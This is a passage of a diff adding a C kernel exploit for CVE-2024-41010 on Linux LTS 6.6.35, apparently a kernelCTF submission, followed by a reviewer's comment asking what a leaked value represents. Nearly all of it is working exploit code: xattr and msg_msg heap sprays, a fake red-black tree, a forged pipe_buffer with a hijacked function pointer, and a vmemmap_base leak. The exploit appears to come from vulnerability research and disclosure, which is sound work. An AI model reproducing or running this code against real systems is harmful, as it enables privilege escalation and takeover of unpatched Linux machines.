pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+	}
+
+	snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, fname_idx);
+	snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 1, XATTR_PADDING_STR);
+	create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+
+	for(int i=prefix_spray_cnt + SECOND_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR);
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+	}
+
+	free(new_xattr);
+}
+
+void spray_simple_xattr_for_fake_rbtree_second(uint64_t target)
+{
+	char file_name[ATTRIBUTE_NAME_LEN];
+	char value_name[XATTR_VALUE_KMALLOC_CG_32K*2];
+	
+	for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		char *attribute_name = gen_xattr_name(XATTR_PREFIX_SECURITY, "attr1");
+		for(int i=0; i<XATTR_VALUE_KMALLOC_CG_32K/8; i++)
+			((uint64_t *)(value_name))[i] = target - 0x20;
+
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_32K, true);
+	}
+}
+
+void generate_fake_rbtree(int pip1[], int pip2[], uint64_t fname_idx, uint64_t target, uint64_t attr_name_ptr, uint64_t conn1, uint64_t conn2)
+{
+	char step[10];
+
+	unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET);
+	
+	set_simple_xattr_for_fake_rbtree_first(fname_idx, attr_name_ptr, conn1, conn2);
+
+	/* ------------- <exploit alloc, cross cache alloc & exploit free, cross cache free> --------------- */
+	write(pip1[1], "step 1", 4);
+	read(pip2[0], step, 10);
+
+	spray_simple_xattr_for_fake_rbtree_second(target);
+	printf("[+] spray xattr, which would be overwriten\n");
+
+	/* -------------------- <exploit write> ------------------------- */
+	write(pip1[1], "step 3", 4);
+
+	/* ---------------------- heap oob read ---------------------------------- */
+	printf("[*] waiting for exit...\n");
+	usleep(100000);
+}
+
+void spray_msgmsg_for_overwrite_pipe_buffer(uint64_t cnt, uint64_t fake_page, uint64_t fake_ops, uint64_t call_func_addr) {
+	char buffer[0x2000] = {0};
+
+	struct pipe_buffer *fake_pipebuf = fake_pipe_buffer(fake_page, 0x0, 0x0, fake_ops, 0x10, 0x40);
+	((uint64_t *)buffer)[0] = call_func_addr;
+	memcpy(buffer + 0x20, fake_pipebuf, sizeof(struct pipe_buffer));
+
+	for (int i = 0; i < cnt; i++) {
+		int msqid = alloc_msg_queue();
+
+		spray_qids[i] = msqid;
+		insert_msg_msgseg(msqid, MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64, MSG_MSGSEG_KMALLOC_CG_64, buffer);
+	}
+}
+
+uint64_t read_msgmsg_for_leak_vmemmap_base(uint64_t cnt) {
+	uint64_t vmemmap_base = 0;
+
+	for(int i=0; i < cnt; i++)
+	{
+		char *buf = read_msg_msgseg(spray_qids[i], MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64);
+
+		if( (((uint64_t *)(buf))[4] >> 48) == 0xffff)
```

Comment:
Please comment here what you are leaking from `(buf)[4]` exactly (which kernel symbol or which field of which object).